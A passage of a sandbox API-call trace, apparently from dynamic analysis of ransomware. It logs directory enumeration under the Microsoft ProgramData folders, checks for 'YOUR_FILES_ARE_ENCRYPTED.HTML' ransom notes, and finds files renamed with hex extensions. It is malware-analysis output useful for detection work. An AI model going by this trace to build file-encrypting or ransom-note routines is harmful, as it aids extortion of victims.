Users\\Microsoft\\eHome" [0169.886] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*" [0169.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.886] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.886] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 1 [0169.886] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned 43 [0169.886] GetProcessHeap () returned 0x270000 [0169.886] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.886] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs" [0169.886] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*" [0169.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.887] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.887] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.887] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.887] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.887] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.887] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.887] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\ehome\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.887] GetProcessHeap () returned 0x270000 [0169.888] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.888] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.888] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0169.888] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.888] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.888] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.888] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0169.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\ehome\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.888] GetProcessHeap () returned 0x270000 [0169.889] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.889] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbbfe3c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbbfe3c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0169.889] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned 44 [0169.889] GetProcessHeap () returned 0x270000 [0169.889] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.889] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL" [0169.889] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*" [0169.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbbfe3c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbbfe3c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.889] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbbfe3c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbbfe3c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.889] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xcbbd8260, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D", cAlternateFileName="PPCRLC~1.33A")) returned 1 [0169.889] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D") returned 125 [0169.889] lstrcmpW (lpString1="ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.889] PathFindExtensionW (pszPath="ppcrlconfig.dll.33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D") returned=".33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D" [0169.890] lstrlenW (lpString=".33AEC534B5F434E39202E7D00C27A5AC2B59A8D343A2F688C90AFBA64658531D") returned 65 [0169.890] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xcbbfe3c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C", cAlternateFileName="")) returned 1 [0169.890] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C") returned 121 [0169.890] lstrcmpW (lpString1="ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.890] PathFindExtensionW (pszPath="ppcrlui.dll.CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C") returned=".CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C" [0169.890] lstrlenW (lpString=".CF020ECB4DCD0C8AFD96045CED69DDB5825BF472D6C6596C05A7575A379BE56C") returned 65 [0169.890] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbd8260, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbbd8260, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc24520, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.890] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0169.890] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.890] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbd8260, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbbd8260, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc24520, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.890] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.890] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0169.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.890] GetProcessHeap () returned 0x270000 [0169.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.891] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0169.891] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player") returned 45 [0169.891] GetProcessHeap () returned 0x270000 [0169.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.891] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player" [0169.891] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*" [0169.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.891] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.891] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.896] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.896] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.896] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.896] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.896] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\media player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.896] GetProcessHeap () returned 0x270000 [0169.897] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.897] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MF", cAlternateFileName="")) returned 1 [0169.897] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF") returned 35 [0169.897] GetProcessHeap () returned 0x270000 [0169.897] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.897] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF" [0169.897] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*" [0169.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0169.898] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL") returned 46 [0169.898] lstrcmpW (lpString1="Active.GRL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.898] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0169.898] lstrlenW (lpString=".GRL") returned 4 [0169.898] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0169.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0169.898] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL") returned 47 [0169.898] lstrcmpW (lpString1="Pending.GRL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.898] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0169.898] lstrlenW (lpString=".GRL") returned 